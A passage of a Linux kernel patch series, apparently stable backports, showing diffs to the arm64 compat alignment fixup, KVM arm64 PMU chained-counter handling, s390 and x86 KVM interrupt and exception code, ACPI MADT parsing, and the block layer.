++++ b/arch/arm64/kernel/compat_alignment.c
+@@ -314,36 +314,32 @@ int do_compat_alignment_fixup(unsigned long addr, struct pt_regs *regs)
+ 	int (*handler)(unsigned long addr, u32 instr, struct pt_regs *regs);
+ 	unsigned int type;
+ 	u32 instr = 0;
+-	u16 tinstr = 0;
+ 	int isize = 4;
+ 	int thumb2_32b = 0;
+-	int fault;
+ 
+ 	instrptr = instruction_pointer(regs);
+ 
+ 	if (compat_thumb_mode(regs)) {
+ 		__le16 __user *ptr = (__le16 __user *)(instrptr & ~1);
++		u16 tinstr, tinst2;
+ 
+-		fault = alignment_get_thumb(regs, ptr, &tinstr);
+-		if (!fault) {
+-			if (IS_T32(tinstr)) {
+-				/* Thumb-2 32-bit */
+-				u16 tinst2;
+-				fault = alignment_get_thumb(regs, ptr + 1, &tinst2);
+-				instr = ((u32)tinstr << 16) | tinst2;
+-				thumb2_32b = 1;
+-			} else {
+-				isize = 2;
+-				instr = thumb2arm(tinstr);
+-			}
++		if (alignment_get_thumb(regs, ptr, &tinstr))
++			return 1;
++
++		if (IS_T32(tinstr)) { /* Thumb-2 32-bit */
++			if (alignment_get_thumb(regs, ptr + 1, &tinst2))
++				return 1;
++			instr = ((u32)tinstr << 16) | tinst2;
++			thumb2_32b = 1;
++		} else {
++			isize = 2;
++			instr = thumb2arm(tinstr);
+ 		}
+ 	} else {
+-		fault = alignment_get_arm(regs, (__le32 __user *)instrptr, &instr);
++		if (alignment_get_arm(regs, (__le32 __user *)instrptr, &instr))
++			return 1;
+ 	}
+ 
+-	if (fault)
+-		return 1;
+-
+ 	switch (CODING_BITS(instr)) {
+ 	case 0x00000000:	/* 3.13.4 load/store instruction extensions */
+ 		if (LDSTHD_I_BIT(instr))
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 0003c7d37533a..67770375c5eed 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -15,16 +15,14 @@
+ #include <kvm/arm_pmu.h>
+ #include <kvm/arm_vgic.h>
+ 
++#define PERF_ATTR_CFG1_COUNTER_64BIT	BIT(0)
++
+ DEFINE_STATIC_KEY_FALSE(kvm_arm_pmu_available);
+ 
+ static LIST_HEAD(arm_pmus);
+ static DEFINE_MUTEX(arm_pmus_lock);
+ 
+ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx);
+-static void kvm_pmu_update_pmc_chained(struct kvm_vcpu *vcpu, u64 select_idx);
+-static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc);
+-
+-#define PERF_ATTR_CFG1_KVM_PMU_CHAINED 0x1
+ 
+ static u32 kvm_pmu_event_mask(struct kvm *kvm)
+ {
+@@ -52,11 +50,22 @@ static u32 kvm_pmu_event_mask(struct kvm *kvm)
+  * @select_idx: The counter index
+  */
+ static bool kvm_pmu_idx_is_64bit(struct kvm_vcpu *vcpu, u64 select_idx)
++{
++	return (select_idx == ARMV8_PMU_CYCLE_IDX);
++}
++
++static bool kvm_pmu_idx_has_64bit_overflow(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+ 	return (select_idx == ARMV8_PMU_CYCLE_IDX &&
+ 		__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_LC);
+ }
+ 
++static bool kvm_pmu_counter_can_chain(struct kvm_vcpu *vcpu, u64 idx)
++{
++	return (!(idx & 1) && (idx + 1) < ARMV8_PMU_CYCLE_IDX &&
++		!kvm_pmu_idx_has_64bit_overflow(vcpu, idx));
++}
++
+ static struct kvm_vcpu *kvm_pmc_to_vcpu(struct kvm_pmc *pmc)
+ {
+ 	struct kvm_pmu *pmu;
+@@ -69,91 +78,22 @@ static struct kvm_vcpu *kvm_pmc_to_vcpu(struct kvm_pmc *pmc)
+ }
+ 
+ /**
+- * kvm_pmu_pmc_is_chained - determine if the pmc is chained
+- * @pmc: The PMU counter pointer
+- */
+-static bool kvm_pmu_pmc_is_chained(struct kvm_pmc *pmc)
+-{
+-	struct kvm_vcpu *vcpu = kvm_pmc_to_vcpu(pmc);
+-
+-	return test_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-}
+-
+-/**
+- * kvm_pmu_idx_is_high_counter - determine if select_idx is a high/low counter
+- * @select_idx: The counter index
+- */
+-static bool kvm_pmu_idx_is_high_counter(u64 select_idx)
+-{
+-	return select_idx & 0x1;
+-}
+-
+-/**
+- * kvm_pmu_get_canonical_pmc - obtain the canonical pmc
+- * @pmc: The PMU counter pointer
+- *
+- * When a pair of PMCs are chained together we use the low counter (canonical)
+- * to hold the underlying perf event.
+- */
+-static struct kvm_pmc *kvm_pmu_get_canonical_pmc(struct kvm_pmc *pmc)
+-{
+-	if (kvm_pmu_pmc_is_chained(pmc) &&
+-	    kvm_pmu_idx_is_high_counter(pmc->idx))
+-		return pmc - 1;
+-
+-	return pmc;
+-}
+-static struct kvm_pmc *kvm_pmu_get_alternate_pmc(struct kvm_pmc *pmc)
+-{
+-	if (kvm_pmu_idx_is_high_counter(pmc->idx))
+-		return pmc - 1;
+-	else
+-		return pmc + 1;
+-}
+-
+-/**
+- * kvm_pmu_idx_has_chain_evtype - determine if the event type is chain
++ * kvm_pmu_get_counter_value - get PMU counter value
+  * @vcpu: The vcpu pointer
+  * @select_idx: The counter index
+  */
+-static bool kvm_pmu_idx_has_chain_evtype(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	u64 eventsel, reg;
+-
+-	select_idx |= 0x1;
+-
+-	if (select_idx == ARMV8_PMU_CYCLE_IDX)
+-		return false;
+-
+-	reg = PMEVTYPER0_EL0 + select_idx;
+-	eventsel = __vcpu_sys_reg(vcpu, reg) & kvm_pmu_event_mask(vcpu->kvm);
+-
+-	return eventsel == ARMV8_PMUV3_PERFCTR_CHAIN;
+-}
+-
+-/**
+- * kvm_pmu_get_pair_counter_value - get PMU counter value
+- * @vcpu: The vcpu pointer
+- * @pmc: The PMU counter pointer
+- */
+-static u64 kvm_pmu_get_pair_counter_value(struct kvm_vcpu *vcpu,
+-					  struct kvm_pmc *pmc)
++u64 kvm_pmu_get_counter_value(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+-	u64 counter, counter_high, reg, enabled, running;
+-
+-	if (kvm_pmu_pmc_is_chained(pmc)) {
+-		pmc = kvm_pmu_get_canonical_pmc(pmc);
+-		reg = PMEVCNTR0_EL0 + pmc->idx;
++	u64 counter, reg, enabled, running;
++	struct kvm_pmu *pmu = &vcpu->arch.pmu;
++	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+ 
+-		counter = __vcpu_sys_reg(vcpu, reg);
+-		counter_high = __vcpu_sys_reg(vcpu, reg + 1);
++	if (!kvm_vcpu_has_pmu(vcpu))
++		return 0;
+ 
+-		counter = lower_32_bits(counter) | (counter_high << 32);
+-	} else {
+-		reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
+-		      ? PMCCNTR_EL0 : PMEVCNTR0_EL0 + pmc->idx;
+-		counter = __vcpu_sys_reg(vcpu, reg);
+-	}
++	reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
++		? PMCCNTR_EL0 : PMEVCNTR0_EL0 + pmc->idx;
++	counter = __vcpu_sys_reg(vcpu, reg);
+ 
+ 	/*
+ 	 * The real counter value is equal to the value of counter register plus
+@@ -163,29 +103,7 @@ static u64 kvm_pmu_get_pair_counter_value(struct kvm_vcpu *vcpu,
+ 		counter += perf_event_read_value(pmc->perf_event, &enabled,
+ 						 &running);
+ 
+-	return counter;
+-}
+-
+-/**
+- * kvm_pmu_get_counter_value - get PMU counter value
+- * @vcpu: The vcpu pointer
+- * @select_idx: The counter index
+- */
+-u64 kvm_pmu_get_counter_value(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	u64 counter;
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+-
+-	if (!kvm_vcpu_has_pmu(vcpu))
+-		return 0;
+-
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
+-
+-	if (kvm_pmu_pmc_is_chained(pmc) &&
+-	    kvm_pmu_idx_is_high_counter(select_idx))
+-		counter = upper_32_bits(counter);
+-	else if (select_idx != ARMV8_PMU_CYCLE_IDX)
++	if (!kvm_pmu_idx_is_64bit(vcpu, select_idx))
+ 		counter = lower_32_bits(counter);
+ 
+ 	return counter;
+@@ -218,7 +136,6 @@ void kvm_pmu_set_counter_value(struct kvm_vcpu *vcpu, u64 select_idx, u64 val)
+  */
+ static void kvm_pmu_release_perf_event(struct kvm_pmc *pmc)
+ {
+-	pmc = kvm_pmu_get_canonical_pmc(pmc);
+ 	if (pmc->perf_event) {
+ 		perf_event_disable(pmc->perf_event);
+ 		perf_event_release_kernel(pmc->perf_event);
+@@ -236,11 +153,10 @@ static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc)
+ {
+ 	u64 counter, reg, val;
+ 
+-	pmc = kvm_pmu_get_canonical_pmc(pmc);
+ 	if (!pmc->perf_event)
+ 		return;
+ 
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
++	counter = kvm_pmu_get_counter_value(vcpu, pmc->idx);
+ 
+ 	if (pmc->idx == ARMV8_PMU_CYCLE_IDX) {
+ 		reg = PMCCNTR_EL0;
+@@ -252,9 +168,6 @@ static void kvm_pmu_stop_counter(struct kvm_vcpu *vcpu, struct kvm_pmc *pmc)
+ 
+ 	__vcpu_sys_reg(vcpu, reg) = val;
+ 
+-	if (kvm_pmu_pmc_is_chained(pmc))
+-		__vcpu_sys_reg(vcpu, reg + 1) = upper_32_bits(counter);
+-
+ 	kvm_pmu_release_perf_event(pmc);
+ }
+ 
+@@ -285,8 +198,6 @@ void kvm_pmu_vcpu_reset(struct kvm_vcpu *vcpu)
+ 
+ 	for_each_set_bit(i, &mask, 32)
+ 		kvm_pmu_stop_counter(vcpu, &pmu->pmc[i]);
+-
+-	bitmap_zero(vcpu->arch.pmu.chained, ARMV8_PMU_MAX_COUNTER_PAIRS);
+ }
+ 
+ /**
+@@ -340,12 +251,9 @@ void kvm_pmu_enable_counter_mask(struct kvm_vcpu *vcpu, u64 val)
+ 
+ 		pmc = &pmu->pmc[i];
+ 
+-		/* A change in the enable state may affect the chain state */
+-		kvm_pmu_update_pmc_chained(vcpu, i);
+-		kvm_pmu_create_perf_event(vcpu, i);
+-
+-		/* At this point, pmc must be the canonical */
+-		if (pmc->perf_event) {
++		if (!pmc->perf_event) {
++			kvm_pmu_create_perf_event(vcpu, i);
++		} else {
+ 			perf_event_enable(pmc->perf_event);
+ 			if (pmc->perf_event->state != PERF_EVENT_STATE_ACTIVE)
+ 				kvm_debug("fail to enable perf event\n");
+@@ -375,11 +283,6 @@ void kvm_pmu_disable_counter_mask(struct kvm_vcpu *vcpu, u64 val)
+ 
+ 		pmc = &pmu->pmc[i];
+ 
+-		/* A change in the enable state may affect the chain state */
+-		kvm_pmu_update_pmc_chained(vcpu, i);
+-		kvm_pmu_create_perf_event(vcpu, i);
+-
+-		/* At this point, pmc must be the canonical */
+ 		if (pmc->perf_event)
+ 			perf_event_disable(pmc->perf_event);
+ 	}
+@@ -484,6 +387,65 @@ static void kvm_pmu_perf_overflow_notify_vcpu(struct irq_work *work)
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++/*
++ * Perform an increment on any of the counters described in @mask,
++ * generating the overflow if required, and propagate it as a chained
++ * event if possible.
++ */
++static void kvm_pmu_counter_increment(struct kvm_vcpu *vcpu,
++				      unsigned long mask, u32 event)
++{
++	int i;
++
++	if (!(__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_E))
++		return;
++
++	/* Weed out disabled counters */
++	mask &= __vcpu_sys_reg(vcpu, PMCNTENSET_EL0);
++
++	for_each_set_bit(i, &mask, ARMV8_PMU_CYCLE_IDX) {
++		u64 type, reg;
++
++		/* Filter on event type */
++		type = __vcpu_sys_reg(vcpu, PMEVTYPER0_EL0 + i);
++		type &= kvm_pmu_event_mask(vcpu->kvm);
++		if (type != event)
++			continue;
++
++		/* Increment this counter */
++		reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) + 1;
++		reg = lower_32_bits(reg);
++		__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) = reg;
++
++		if (reg) /* No overflow? move on */
++			continue;
++
++		/* Mark overflow */
++		__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i);
++
++		if (kvm_pmu_counter_can_chain(vcpu, i))
++			kvm_pmu_counter_increment(vcpu, BIT(i + 1),
++						  ARMV8_PMUV3_PERFCTR_CHAIN);
++	}
++}
++
++/* Compute the sample period for a given counter value */
++static u64 compute_period(struct kvm_vcpu *vcpu, u64 select_idx, u64 counter)
++{
++	u64 val;
++
++	if (kvm_pmu_idx_is_64bit(vcpu, select_idx)) {
++		if (!kvm_pmu_idx_has_64bit_overflow(vcpu, select_idx))
++			val = -(counter & GENMASK(31, 0));
++		else
++			val = (-counter) & GENMASK(63, 0);
++	} else {
++		val = (-counter) & GENMASK(31, 0);
++	}
++
++	return val;
++}
++
+ /**
+  * When the perf event overflows, set the overflow status and inform the vcpu.
+  */
+@@ -503,10 +465,7 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+ 	 * Reset the sample period to the architectural limit,
+ 	 * i.e. the point where the counter overflows.
+ 	 */
+-	period = -(local64_read(&perf_event->count));
+-
+-	if (!kvm_pmu_idx_is_64bit(vcpu, pmc->idx))
+-		period &= GENMASK(31, 0);
++	period = compute_period(vcpu, idx, local64_read(&perf_event->count));
+ 
+ 	local64_set(&perf_event->hw.period_left, 0);
+ 	perf_event->attr.sample_period = period;
+@@ -514,6 +473,10 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+ 
+ 	__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(idx);
+ 
++	if (kvm_pmu_counter_can_chain(vcpu, idx))
++		kvm_pmu_counter_increment(vcpu, BIT(idx + 1),
++					  ARMV8_PMUV3_PERFCTR_CHAIN);
++
+ 	if (kvm_pmu_overflow_status(vcpu)) {
+ 		kvm_make_request(KVM_REQ_IRQ_PENDING, vcpu);
+ 
+@@ -533,50 +496,7 @@ static void kvm_pmu_perf_overflow(struct perf_event *perf_event,
+  */
+ void kvm_pmu_software_increment(struct kvm_vcpu *vcpu, u64 val)
+ {
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	int i;
+-
+-	if (!kvm_vcpu_has_pmu(vcpu))
+-		return;
+-
+-	if (!(__vcpu_sys_reg(vcpu, PMCR_EL0) & ARMV8_PMU_PMCR_E))
+-		return;
+-
+-	/* Weed out disabled counters */
+-	val &= __vcpu_sys_reg(vcpu, PMCNTENSET_EL0);
+-
+-	for (i = 0; i < ARMV8_PMU_CYCLE_IDX; i++) {
+-		u64 type, reg;
+-
+-		if (!(val & BIT(i)))
+-			continue;
+-
+-		/* PMSWINC only applies to ... SW_INC! */
+-		type = __vcpu_sys_reg(vcpu, PMEVTYPER0_EL0 + i);
+-		type &= kvm_pmu_event_mask(vcpu->kvm);
+-		if (type != ARMV8_PMUV3_PERFCTR_SW_INCR)
+-			continue;
+-
+-		/* increment this even SW_INC counter */
+-		reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) + 1;
+-		reg = lower_32_bits(reg);
+-		__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i) = reg;
+-
+-		if (reg) /* no overflow on the low part */
+-			continue;
+-
+-		if (kvm_pmu_pmc_is_chained(&pmu->pmc[i])) {
+-			/* increment the high counter */
+-			reg = __vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i + 1) + 1;
+-			reg = lower_32_bits(reg);
+-			__vcpu_sys_reg(vcpu, PMEVCNTR0_EL0 + i + 1) = reg;
+-			if (!reg) /* mark overflow on the high counter */
+-				__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i + 1);
+-		} else {
+-			/* mark overflow on low counter */
+-			__vcpu_sys_reg(vcpu, PMOVSSET_EL0) |= BIT(i);
+-		}
+-	}
++	kvm_pmu_counter_increment(vcpu, val, ARMV8_PMUV3_PERFCTR_SW_INCR);
+ }
+ 
+ /**
+@@ -591,6 +511,9 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return;
+ 
++	/* The reset bits don't indicate any state, and shouldn't be saved. */
++	__vcpu_sys_reg(vcpu, PMCR_EL0) = val & ~(ARMV8_PMU_PMCR_C | ARMV8_PMU_PMCR_P);
++
+ 	if (val & ARMV8_PMU_PMCR_E) {
+ 		kvm_pmu_enable_counter_mask(vcpu,
+ 		       __vcpu_sys_reg(vcpu, PMCNTENSET_EL0));
+@@ -625,18 +548,11 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ {
+ 	struct arm_pmu *arm_pmu = vcpu->kvm->arch.arm_pmu;
+ 	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc;
++	struct kvm_pmc *pmc = &pmu->pmc[select_idx];
+ 	struct perf_event *event;
+ 	struct perf_event_attr attr;
+ 	u64 eventsel, counter, reg, data;
+ 
+-	/*
+-	 * For chained counters the event type and filtering attributes are
+-	 * obtained from the low/even counter. We also use this counter to
+-	 * determine if the event is enabled/disabled.
+-	 */
+-	pmc = kvm_pmu_get_canonical_pmc(&pmu->pmc[select_idx]);
+-
+ 	reg = (pmc->idx == ARMV8_PMU_CYCLE_IDX)
+ 	      ? PMCCFILTR_EL0 : PMEVTYPER0_EL0 + pmc->idx;
+ 	data = __vcpu_sys_reg(vcpu, reg);
+@@ -647,8 +563,12 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	else
+ 		eventsel = data & kvm_pmu_event_mask(vcpu->kvm);
+ 
+-	/* Software increment event doesn't need to be backed by a perf event */
+-	if (eventsel == ARMV8_PMUV3_PERFCTR_SW_INCR)
++	/*
++	 * Neither SW increment nor chained events need to be backed
++	 * by a perf event.
++	 */
++	if (eventsel == ARMV8_PMUV3_PERFCTR_SW_INCR ||
++	    eventsel == ARMV8_PMUV3_PERFCTR_CHAIN)
+ 		return;
+ 
+ 	/*
+@@ -670,30 +590,20 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	attr.exclude_host = 1; /* Don't count host events */
+ 	attr.config = eventsel;
+ 
+-	counter = kvm_pmu_get_pair_counter_value(vcpu, pmc);
++	counter = kvm_pmu_get_counter_value(vcpu, select_idx);
+ 
+-	if (kvm_pmu_pmc_is_chained(pmc)) {
+-		/**
+-		 * The initial sample period (overflow count) of an event. For
+-		 * chained counters we only support overflow interrupts on the
+-		 * high counter.
+-		 */
+-		attr.sample_period = (-counter) & GENMASK(63, 0);
+-		attr.config1 |= PERF_ATTR_CFG1_KVM_PMU_CHAINED;
++	/*
++	 * If counting with a 64bit counter, advertise it to the perf
++	 * code, carefully dealing with the initial sample period
++	 * which also depends on the overflow.
++	 */
++	if (kvm_pmu_idx_is_64bit(vcpu, select_idx))
++		attr.config1 |= PERF_ATTR_CFG1_COUNTER_64BIT;
+ 
+-		event = perf_event_create_kernel_counter(&attr, -1, current,
+-							 kvm_pmu_perf_overflow,
+-							 pmc + 1);
+-	} else {
+-		/* The initial sample period (overflow count) of an event. */
+-		if (kvm_pmu_idx_is_64bit(vcpu, pmc->idx))
+-			attr.sample_period = (-counter) & GENMASK(63, 0);
+-		else
+-			attr.sample_period = (-counter) & GENMASK(31, 0);
++	attr.sample_period = compute_period(vcpu, select_idx, counter);
+ 
+-		event = perf_event_create_kernel_counter(&attr, -1, current,
++	event = perf_event_create_kernel_counter(&attr, -1, current,
+ 						 kvm_pmu_perf_overflow, pmc);
+-	}
+ 
+ 	if (IS_ERR(event)) {
+ 		pr_err_once("kvm: pmu event creation failed %ld\n",
+@@ -704,41 +614,6 @@ static void kvm_pmu_create_perf_event(struct kvm_vcpu *vcpu, u64 select_idx)
+ 	pmc->perf_event = event;
+ }
+ 
+-/**
+- * kvm_pmu_update_pmc_chained - update chained bitmap
+- * @vcpu: The vcpu pointer
+- * @select_idx: The number of selected counter
+- *
+- * Update the chained bitmap based on the event type written in the
+- * typer register and the enable state of the odd register.
+- */
+-static void kvm_pmu_update_pmc_chained(struct kvm_vcpu *vcpu, u64 select_idx)
+-{
+-	struct kvm_pmu *pmu = &vcpu->arch.pmu;
+-	struct kvm_pmc *pmc = &pmu->pmc[select_idx], *canonical_pmc;
+-	bool new_state, old_state;
+-
+-	old_state = kvm_pmu_pmc_is_chained(pmc);
+-	new_state = kvm_pmu_idx_has_chain_evtype(vcpu, pmc->idx) &&
+-		    kvm_pmu_counter_is_enabled(vcpu, pmc->idx | 0x1);
+-
+-	if (old_state == new_state)
+-		return;
+-
+-	canonical_pmc = kvm_pmu_get_canonical_pmc(pmc);
+-	kvm_pmu_stop_counter(vcpu, canonical_pmc);
+-	if (new_state) {
+-		/*
+-		 * During promotion from !chained to chained we must ensure
+-		 * the adjacent counter is stopped and its event destroyed
+-		 */
+-		kvm_pmu_stop_counter(vcpu, kvm_pmu_get_alternate_pmc(pmc));
+-		set_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-		return;
+-	}
+-	clear_bit(pmc->idx >> 1, vcpu->arch.pmu.chained);
+-}
+-
+ /**
+  * kvm_pmu_set_counter_event_type - set selected counter to monitor some event
+  * @vcpu: The vcpu pointer
+@@ -766,7 +641,6 @@ void kvm_pmu_set_counter_event_type(struct kvm_vcpu *vcpu, u64 data,
+ 
+ 	__vcpu_sys_reg(vcpu, reg) = data & mask;
+ 
+-	kvm_pmu_update_pmc_chained(vcpu, select_idx);
+ 	kvm_pmu_create_perf_event(vcpu, select_idx);
+ }
+ 
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index bfe4f17232b3e..1f80e17a64608 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -697,13 +697,15 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		return false;
+ 
+ 	if (p->is_write) {
+-		/* Only update writeable bits of PMCR */
++		/*
++		 * Only update writeable bits of PMCR (continuing into
++		 * kvm_pmu_handle_pmcr() as well)
++		 */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0);
+ 		val &= ~ARMV8_PMU_PMCR_MASK;
+ 		val |= p->regval & ARMV8_PMU_PMCR_MASK;
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+-		__vcpu_sys_reg(vcpu, PMCR_EL0) = val;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+ 		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index 88112065d9411..ee7478a601442 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -271,10 +271,18 @@ static int handle_prog(struct kvm_vcpu *vcpu)
+  * handle_external_interrupt - used for external interruption interceptions
+  * @vcpu: virtual cpu
+  *
+- * This interception only occurs if the CPUSTAT_EXT_INT bit was set, or if
+- * the new PSW does not have external interrupts disabled. In the first case,
+- * we've got to deliver the interrupt manually, and in the second case, we
+- * drop to userspace to handle the situation there.
++ * This interception occurs if:
++ * - the CPUSTAT_EXT_INT bit was already set when the external interrupt
++ *   occurred. In this case, the interrupt needs to be injected manually to
++ *   preserve interrupt priority.
++ * - the external new PSW has external interrupts enabled, which will cause an
++ *   interruption loop. We drop to userspace in this case.
++ *
++ * The latter case can be detected by inspecting the external mask bit in the
++ * external new psw.
++ *
++ * Under PV, only the latter case can occur, since interrupt priorities are
++ * handled in the ultravisor.
+  */
+ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ {
+@@ -285,10 +293,18 @@ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ 
+ 	vcpu->stat.exit_external_interrupt++;
+ 
+-	rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
+-	if (rc)
+-		return rc;
+-	/* We can not handle clock comparator or timer interrupt with bad PSW */
++	if (kvm_s390_pv_cpu_is_protected(vcpu)) {
++		newpsw = vcpu->arch.sie_block->gpsw;
++	} else {
++		rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
++		if (rc)
++			return rc;
++	}
++
++	/*
++	 * Clock comparator or timer interrupt with external interrupt enabled
++	 * will cause interrupt loop. Drop to userspace.
++	 */
+ 	if ((eic == EXT_IRQ_CLK_COMP || eic == EXT_IRQ_CPU_TIMER) &&
+ 	    (newpsw.mask & PSW_MASK_EXT))
+ 		return -EOPNOTSUPP;
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 518bda50068cb..0f762070a5e10 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -146,7 +146,11 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+-	if (madt->header.revision >= 5)
++
++	/* ACPI 6.3 and newer support the online capable bit. */
++	if (acpi_gbl_FADT.header.revision > 6 ||
++	    (acpi_gbl_FADT.header.revision == 6 &&
++	     acpi_gbl_FADT.minor_revision >= 3))
+ 		acpi_support_online_capable = true;
+ 
+ 	default_acpi_madt_oem_check(madt->header.oem_id,
+@@ -193,7 +197,8 @@ static bool __init acpi_is_processor_usable(u32 lapic_flags)
+ 	if (lapic_flags & ACPI_MADT_ENABLED)
+ 		return true;
+ 
+-	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_support_online_capable ||
++	    (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
+ 		return true;
+ 
+ 	return false;
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 1d00f7824da1e..8e56ec6e72e9d 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3845,7 +3845,12 @@ static void nested_vmx_inject_exception_vmexit(struct kvm_vcpu *vcpu)
+ 		exit_qual = 0;
+ 	}
+ 
+-	if (ex->has_error_code) {
++	/*
++	 * Unlike AMD's Paged Real Mode, which reports an error code on #PF
++	 * VM-Exits even if the CPU is in Real Mode, Intel VMX never sets the
++	 * "has error code" flags on VM-Exit if the CPU is in Real Mode.
++	 */
++	if (ex->has_error_code && is_protmode(vcpu)) {
+ 		/*
+ 		 * Intel CPUs do not generate error codes with bits 31:16 set,
+ 		 * and more importantly VMX disallows setting bits 31:16 in the
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index ab09d292bdede..3463ef7f30196 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9853,13 +9853,20 @@ int kvm_check_nested_events(struct kvm_vcpu *vcpu)
+ 
+ static void kvm_inject_exception(struct kvm_vcpu *vcpu)
+ {
++	/*
++	 * Suppress the error code if the vCPU is in Real Mode, as Real Mode
++	 * exceptions don't report error codes.  The presence of an error code
++	 * is carried with the exception and only stripped when the exception
++	 * is injected as intercepted #PF VM-Exits for AMD's Paged Real Mode do
++	 * report an error code despite the CPU being in Real Mode.
++	 */
++	vcpu->arch.exception.has_error_code &= is_protmode(vcpu);
++
+ 	trace_kvm_inj_exception(vcpu->arch.exception.vector,
+ 				vcpu->arch.exception.has_error_code,
+ 				vcpu->arch.exception.error_code,
+ 				vcpu->arch.exception.injected);
+ 
+-	if (vcpu->arch.exception.error_code && !is_protmode(vcpu))
+-		vcpu->arch.exception.error_code = false;
+ 	static_call(kvm_x86_inject_exception)(vcpu);
+ }
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index aa67a52c5a069..1b04a1c48ee50 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1327,8 +1327,6 @@ bool blk_rq_is_poll(struct request *rq)
+ 		return false;
+ 	if (rq->mq_hctx->type != HCTX_TYPE_POLL)
+ 		return false;
+-	if (WARN_ON_ONCE(!rq->bio))
+-		return false;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+@@ -1336,7 +1334,7 @@ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+ static void blk_rq_poll_completion(struct request *rq, struct completion *wait)
+ {
+ 	do {
+-		bio_poll(rq->bio, NULL, 0);
++		blk_mq_poll(rq->q, blk_rq_to_qc(rq), NULL, 0);
+ 		cond_resched();
+ 	} while (!completion_done(wait));
+ }
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 847721dc2b2b8..f1bc600c4ded6 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -1066,7 +1066,6 @@ static void tg_dispatch_one_bio(struct throtl_grp *tg, bool rw)
+ 	sq->nr_queued[rw]--;
+ 
+ 	throtl_charge_bio(tg, bio);
+-	bio_set_flag(bio, BIO_BPS_THROTTLED);
+ 
+ 	/*
+ 	 * If our parent is another tg, we just need to transfer @bio to
+@@ -1079,6 +1078,7 @@ static void tg_dispatch_one_bio(struct throtl_grp *tg, bool rw)
+ 		throtl_add_bio_tg(bio, &tg->qnode_on_parent[rw], parent_tg);
